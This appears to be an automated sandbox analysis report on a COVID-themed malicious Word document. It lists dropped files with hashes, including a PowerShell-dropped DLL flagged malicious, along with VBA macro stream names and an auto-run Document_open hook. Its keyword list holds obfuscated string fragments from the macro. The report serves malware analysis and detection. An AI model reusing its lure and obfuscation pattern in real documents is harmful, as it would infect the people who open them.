                                SSDEEP:48:8+HN/XT0jFP/oJaAgQh2+HN/XT0jFP/oJaAgQ/:8k/XojFP/QgQh2k/XojFP/QgQ/
                                MD5:304C2F49F9864FAC78BABAE0D1C6272F
                                SHA1:7D5B556152C92E5A92D3262C2E1A13BECFAA6FD2
                                SHA-256:096B9CA75D85372CDC6CE374749D9F5535321E74FE763432A32ED096B08B20CA
                                SHA-512:5D288F03B6D116A0977357A0E56396E8CD7A85DA0D7DFB8B1E78F7006DF433D2CB1BD7201145ADC8CFF63C5C53325EE3BCAAD8016CD533C85E45A07943D661A0
                                Malicious:false
                                Reputation:low
                                Preview: L..................F.... ...I'..{..I'..{..c.}]Z....z...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..z..-R.. .AG6027~1.DOC..t.......Q.y.Q.y*...8.....................A.G.6.0.2.7.3.9.2.8.I._.C.O.V.I.D.-.1.9._.S.A.R.S.-.C.o.V.-.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop\AG60273928I_COVID-19_SARS-CoV-2.doc.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.G.6.0.2.7.3.9.2.8.I._.C.O.V.I.D.-.1.9._.S.A.R.S.-.C.o.V.-.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):131
                                Entropy (8bit):4.815604707536106
                                Encrypted:false
                                SSDEEP:3:M1rpGcooOpU8gXGcooOpUmX1rpGcooOpUv:MLHspuHsppHsp2
                                MD5:E74E90FCAF7772B822493589DB47C6F9
                                SHA1:FA060EFFEED1184405B4C5B2247CD98FF8578817
                                SHA-256:ADA0C5277F4289117A547E6D892A2389D43D1E925CC573D8EA0D3E956F70B3F4
                                SHA-512:C4898407B2113F63B1DE878B7F85C47C83B1B7599974C55C5DD48E4368D495BEAECD4B1A056C9C60D9FF6A071CE0D9C9BF711D1076302B1DBC6C9FC37393D0B4
                                Malicious:false
                                Reputation:low
                                Preview: [doc]..AG60273928I_COVID-19_SARS-CoV-2.LNK=0..AG60273928I_COVID-19_SARS-CoV-2.LNK=0..[doc]..AG60273928I_COVID-19_SARS-CoV-2.LNK=0..
                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.431160061181642
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                Malicious:false
                                Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J81QN4I88FVGHDT92CK8.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5847397118390782
                                Encrypted:false
                                SSDEEP:96:chQCsMqmqvsqvJCwoqz8hQCsMqmqvsEHyqvJCworAzvlYjHRf8OYlUV0Iu:cy7oqz8yvHnorAzvqf8OQIu
                                MD5:DD53FABC928ECE0AAF9143B6978F5DEC
                                SHA1:A1E01E968D252BC3A12894A4AFCDFAD83AD74F41
                                SHA-256:14E0AB9FF66C04E87804FD82DBF585F667A3453DE5A6B902934562D3BCE84EBD
                                SHA-512:C2E2C89B199898B7CA58BD320AAA14197DBF539693EE17C89A3E0E4681F0EA6C0AE827239033974FC0F8E78B5575A30430C1A4A22B09438B04EA3CC517C97963
                                Malicious:false
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\Desktop\~$60273928I_COVID-19_SARS-CoV-2.doc
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.431160061181642
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                Malicious:false
                                Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):340824
                                Entropy (8bit):4.347498688978882
                                Encrypted:false
                                SSDEEP:3072:eG9ctfNneahaNfjraHoEkApi23X5TKavlyw8W8:eG+Fe17mHoU/3NywH8
                                MD5:D9ED9211C02695D3F3B88F55471BA6E2
                                SHA1:BFF2DCB56FCFEB3CABE48896CE093606915FD0C2
                                SHA-256:A2DA516FB54B231DF55F50BB6C1735CC43D6D634E5EF5925557D18A0AA15DA2F
                                SHA-512:578902C99938395CF7C76C5ABB5F85D515494B0CB4E1CE794A2F56A28BA854F60D096F2C54C9954CD192B751311FA0A2D45442ABD644D044BEC7435D8E1D36DB
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.._...........!...2.F...........!.......`...............................`...............................................p..d.......................X....P......................................................xr...............................text....C.......D.................. ..`.rdata.......`.......H..............@..@.data........p.......J..............@....text4...............T..............@....text5..d....@...................... ..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Licensed Borders Strategist Brook Designer sky blue overriding neural auxiliary Ergonomic Metal Pants International Solutions withdrawal Associate, Author: La Breton, Template: Normal.dotm, Last Saved By: Nicolas Menard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 12 14:56:00 2021, Last Saved Time/Date: Tue Jan 12 14:57:00 2021, Number of Pages: 1, Number of Words: 2554, Number of Characters: 14559, Security: 8
                                Entropy (8bit):6.6917397440496424
                                TrID:
                                • Microsoft Word document (32009/1) 79.99%
                                • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                File name:AG60273928I_COVID-19_SARS-CoV-2.doc
                                File size:161373
                                MD5:6d718814f5cf1ccd99905fdac40a504a
                                SHA1:f1746098ad2bb75e3054351b190cc818712ae46a
                                SHA256:6bb1fa2cba1d52674b980804939a39bb7dc3a68a364402d393e6a3ae520cdce9
                                SHA512:8211b228f5194e9dcbd68be1438631b07bd4534ddaa7b646a20e2f551acd883a1a190b4db46c0589f35d9f1dc9257c7d03829972ab401ce069358828dbe57e7d
                                SSDEEP:3072:u9ufstRUUKSns8T00JSHUgteMJ8qMD7gmd:u9ufsfgIf0pLmd
                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                File Icon

                                Icon Hash:e4eea2aaa4b4b4a4

                                Static OLE Info

                                General

                                Document Type:OLE
                                Number of OLE Files:1

                                OLE File "AG60273928I_COVID-19_SARS-CoV-2.doc"

                                Indicators

                                Has Summary Info:True
                                Application Name:Microsoft Office Word
                                Encrypted Document:False
                                Contains Word Document Stream:True
                                Contains Workbook/Book Stream:False
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:True

                                Summary

                                Code Page:1252
                                Title:
                                Subject:Licensed Borders Strategist Brook Designer sky blue overriding neural auxiliary Ergonomic Metal Pants International Solutions withdrawal Associate
                                Author:La Breton
                                Keywords:
                                Comments:
                                Template:Normal.dotm
                                Last Saved By:Nicolas Menard
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2021-01-12 14:56:00
                                Last Saved Time:2021-01-12 14:57:00
                                Number of Pages:1
                                Number of Words:2554
                                Number of Characters:14559
                                Creating Application:Microsoft Office Word
                                Security:8

                                Document Summary

                                Document Code Page:-535
                                Number of Lines:121
                                Number of Paragraphs:34
                                Thumbnail Scaling Desired:False
                                Company:
                                Contains Dirty Links:False
                                Shared Document:False
                                Changed Hyperlinks:False
                                Application Version:917504

                                Streams with VBA

                                VBA File Name: L95wkirc_zm, Stream Size: 697
                                General
                                Stream Path:Macros/VBA/L95wkirc_zm
                                VBA File Name:L95wkirc_zm
                                Stream Size:697
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 7d 9a d6 11 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                Attribute
                                VB_Name
                                VBA Code
                                VBA File Name: Ut2r21ym17z8, Stream Size: 1108
                                General
                                Stream Path:Macros/VBA/Ut2r21ym17z8
                                VBA File Name:Ut2r21ym17z8
                                Stream Size:1108
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 7d 9a 7f e9 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                False
                                Private
                                VB_Exposed
                                Attribute
                                VB_Creatable
                                VB_Name
                                Document_open()
                                VB_PredeclaredId
                                VB_GlobalNameSpace
                                VB_Base
                                VB_Customizable
                                VB_TemplateDerived
                                VBA Code
                                VBA File Name: Wnoyuuu28ekk6591v, Stream Size: 10959
                                General
                                Stream Path:Macros/VBA/Wnoyuuu28ekk6591v
                                VBA File Name:Wnoyuuu28ekk6591v
                                Stream Size:10959
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . } . w Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 14 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 1b 06 00 00 7b 1f 00 00 00 00 00 00 01 00 00 00 7d 9a 77 5a 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                QiUwq
                                KKUcJE
                                IRzIEJEhH
                                wKzNWHJF:
                                "w]xm[vw]xm[v"
                                euCMS
                                pOJMnADCJ
                                JYGXBIlF
                                bdthsD
                                Fix(BXAuAz)
                                "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
                                iMCSwT:
                                (Fix(BXAuAz)
                                Fix(haldI)
                                NgFCwDc
                                MzYdG
                                Fix(KVceECFW)
                                Fix(HqDzXCHAl)
                                aENWC
                                HqDzXCHAl:
                                Deywj
                                HlSCAZ
                                NHXknCOIO
                                HCvew
                                (Fix(NRQDYIEuB)
                                pBfoEG
                                KVceECFW
                                gGWPAaQE
                                ZPIhEMFUB
                                PQQqeFIV
                                WLUaHmEM
                                HqDzXCHAl
                                AmBRDm
                                syZqCACD:
                                GbHdGd
                                wBPVCHmC
                                vZKQBuM
                                EhgwMQ
                                IFSjFIkG
                                ZDZjIB
                                oXEtI:
                                Fix(PQQqeFIV)
                                Fix(dFxICEjw)
                                RMuSICrX
                                Fix(vZKQBuM)
                                Fix(euCMS)
                                oXEtI
                                bmEDqv
                                SyFFGiI
                                ZWQKFHwJE
                                Fix(hqoyYzBsF)
                                eIaaFZ
                                (Fix(AmBRDm)
                                sjOmJFFlU
                                Fix(ZtkoHFBJE)
                                kJLlUyR:
                                dFxICEjw
                                iMCSwT
                                bmUbGyE
                                DFUrCC
                                BcbiEV:
                                XulhC
                                IdwoCFMGd
                                Fix(GXOzFr)
                                Fix(VjnuHqF)
                                Fix(qomwTEIy)
                                LVentAcm
                                CsYsXv
                                mtEnt
                                GyqdfE
                                zmkyT
                                haldI:
                                VjnuHqF
                                tjEOD:
                                nqWzNZ
                                (Fix(wBPVCHmC)
                                BXAuAz
                                (Fix(euCMS)
                                Fix(BcbiEV)
                                Resume
                                tjEOD
                                Fix(DFJhGAS)
                                Fix(gGWPAaQE)
                                "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
                                Fix(OBHkWHOT)
                                ElseIf
                                lQgtJ
                                LLIuCIBBB
                                (Fix(iBHSjSEa)
                                ZJaTECrE
                                wqynHT:
                                Fix(iBHSjSEa)
                                Fix(FqraEHXFK)
                                prYcEiJ
                                (Fix(KAAvICJ)
                                kJLlUyR
                                iBHSjSEa
                                OBHkWHOT:
                                UCwnFlrZJ
                                SBHKCG
                                KVceECFW:
                                (Fix(DFJhGAS)
                                (Fix(vZKQBuM)
                                KAAvICJ
                                euEPorCJT
                                (Fix(QvXuJE)
                                RfdoD
                                Fix(tjEOD)
                                KFoRcFUC
                                jEfqBuNJA
                                "w]xm[v",
                                LiKWuj
                                hqoyYzBsF
                                RiwhJ
                                FqraEHXFK
                                Error
                                nDoEDU
                                Fix(wqynHT)
                                VjnuHqF:
                                Attribute
                                RYasHk
                                rxeqDoVb
                                IXWSCCJ
                                (Fix(dFxICEjw)
                                Len(dsfe))),
                                Fix(QiUwq)
                                cFNuGfA
                                Fix(AmBRDm)
                                haldI
                                (Fix(QiUwq)
                                GXOzFr
                                dLkMB
                                DFJhGAS
                                Fix(QvXuJE)
                                Fix(kJLlUyR)
                                Fix(wKzNWHJF)
                                VB_Name
                                (Fix(hqoyYzBsF)
                                gpMvF
                                QhiuG
                                gdhXNEq
                                ZtkoHFBJE:
                                Fix(NRQDYIEuB)
                                Function
                                qspTA
                                ZtkoHFBJE
                                BcbiEV
                                LFWNyIzJD
                                VDgoIuF
                                qsfzvZAB
                                NRQDYIEuB
                                ammiJ
                                Fix(KAAvICJ)
                                (Fix(qomwTEIy)
                                qomwTEIy
                                Fix(oXEtI)
                                Double
                                Fix(iMCSwT)
                                QvXuJE
                                wqynHT
                                kamgFA
                                (Fix(FqraEHXFK)
                                wKzNWHJF
                                Fix(syZqCACD)
                                gGWPAaQE:
                                "w]xm[vpw]xm[v"
                                GXOzFr:
                                Mid(Application.Name,
                                OBHkWHOT
                                (Fix(PQQqeFIV)
                                UTgTA
                                Fix(wBPVCHmC)
                                syZqCACD
                                jSHOJAlCH
                                VBA Code

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:146
                                Entropy:4.00187355764
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                General
                                Stream Path:\x5DocumentSummaryInformation
                                File Type:data
                                Stream Size:4096
                                Entropy:0.280441275353
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y . . . . . . . " . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 568
                                General
                                Stream Path:\x5SummaryInformation
                                File Type:data
                                Stream Size:568
                                Entropy:4.21212750192
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 08 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                Stream Path: 1Table, File Type: data, Stream Size: 6424
                                General
                                Stream Path:1Table
                                File Type:data
                                Stream Size:6424
                                Entropy:6.13855158031
                                Base64 Encoded:True
                                Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                Stream Path: Data, File Type: data, Stream Size: 99193
                                General
                                Stream Path:Data
                                File Type:data
                                Stream Size:99193
                                Entropy:7.39010520705
                                Base64 Encoded:True
                                Data ASCII:y . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . & . V . . . . . . . C . . . . . . . . . . . . . . D . . . . . . . . F . . . . . . . & . V . . . . . . . C . . . . . . . . . .
                                Data Raw:79 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 505
                                General
                                Stream Path:Macros/PROJECT
                                File Type:ASCII text, with CRLF line terminators
                                Stream Size:505
                                Entropy:5.46028687806
                                Base64 Encoded:True
                                Data ASCII:I D = " { 8 8 9 0 B E F 4 - C D C 5 - 4 0 D 1 - 8 6 E 8 - 2 F E A 1 F 3 B 5 5 6 F } " . . D o c u m e n t = U t 2 r 2 1 y m 1 7 z 8 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = L 9 5 w k i r c _ z m . . M o d u l e = W n o y u u u 2 8 e k k 6 5 9 1 v . . E x e N a m e 3 2 = " D t 3 2 m n i i 1 _ 8 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 B 5 9 4 2 2 6 9 2 2 A 9 2 2 A 9 2 2 A 9 2 2 A " . . D P B = " A F A D B 6
                                Data Raw:49 44 3d 22 7b 38 38 39 30 42 45 46 34 2d 43 44 43 35 2d 34 30 44 31 2d 38 36 45 38 2d 32 46 45 41 31 46 33 42 35 35 36 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 55 74 32 72 32 31 79 6d 31 37 7a 38 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4c 39 35 77 6b 69 72 63 5f 7a 6d 0d 0a 4d 6f 64 75 6c 65 3d 57 6e 6f 79 75 75 75 32 38 65 6b 6b 36 35 39 31 76 0d 0a 45 78 65
                                Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 131
                                General
                                Stream Path:Macros/PROJECTwm
                                File Type:data
                                Stream Size:131
                                Entropy:3.71027191407
                                Base64 Encoded:False
                                Data ASCII:U t 2 r 2 1 y m 1 7 z 8 . U . t . 2 . r . 2 . 1 . y . m . 1 . 7 . z . 8 . . . L 9 5 w k i r c _ z m . L . 9 . 5 . w . k . i . r . c . _ . z . m . . . W n o y u u u 2 8 e k k 6 5 9 1 v . W . n . o . y . u . u . u . 2 . 8 . e . k . k . 6 . 5 . 9 . 1 . v . . . . .
                                Data Raw:55 74 32 72 32 31 79 6d 31 37 7a 38 00 55 00 74 00 32 00 72 00 32 00 31 00 79 00 6d 00 31 00 37 00 7a 00 38 00 00 00 4c 39 35 77 6b 69 72 63 5f 7a 6d 00 4c 00 39 00 35 00 77 00 6b 00 69 00 72 00 63 00 5f 00 7a 00 6d 00 00 00 57 6e 6f 79 75 75 75 32 38 65 6b 6b 36 35 39 31 76 00 57 00 6e 00 6f 00 79 00 75 00 75 00 75 00 32 00 38 00 65 00 6b 00 6b 00 36 00 35 00 39 00 31 00 76 00 00
                                Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4487
                                General
                                Stream Path:Macros/VBA/_VBA_PROJECT
                                File Type:data
                                Stream Size:4487
                                Entropy:5.34743792545
                                Base64 Encoded:False
                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
